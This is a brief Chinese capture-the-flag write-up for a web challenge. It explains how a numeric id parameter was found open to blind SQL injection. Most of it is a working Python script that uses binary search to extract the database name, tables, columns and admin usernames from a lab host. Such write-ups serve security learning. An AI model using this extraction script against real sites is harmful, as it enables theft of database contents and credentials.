Black-Watch-入群题-Web

摘要
sql数字型盲注

点击热点列表，存在一个id索引，测试2/2返回id=1的内容，判断为数字型注入，测试发现可以盲注，没什么过滤

# coding=utf-8
import requests
import time

flag = ""
url0 = "http://89f00b7b-7f72-4344-a14d-126dd667006a.node4.buuoj.cn:81/backend/content_detail.php?id={}"

sql1 = "if(ord(substr(database(),{},1))>={},1,0)"
# 库名
sql2 = "if(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))>={},1,0)"
# 表名
sql3 = "if(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),{},1))>={},1,0)"
# 列名
sql4 = "if(ord(substr((select(group_concat(username))from(admin)),{},1))>={},1,0)"
# 数据

url = url0.format(sql4)
# 选择查询语句

for x in range(1, 100):
    left = 32
    right = 127
    while right > left:
        mid = int((left + right + 1) / 2)
        x = str(x)
        y = str(mid)
        pay = url.format(x, y)
        response = requests.get(url=pay)
        if "title" in response.text:
            left = mid
        else:
            right = mid - 1
        time.sleep(0.02)  #防止脏数据
    # print(pay)
    # print(response.text)
    flag += (chr(int(right)))
    print(chr(int(right)))
    print(flag)
print(flag)

获取admin表中的账号，登录获得flag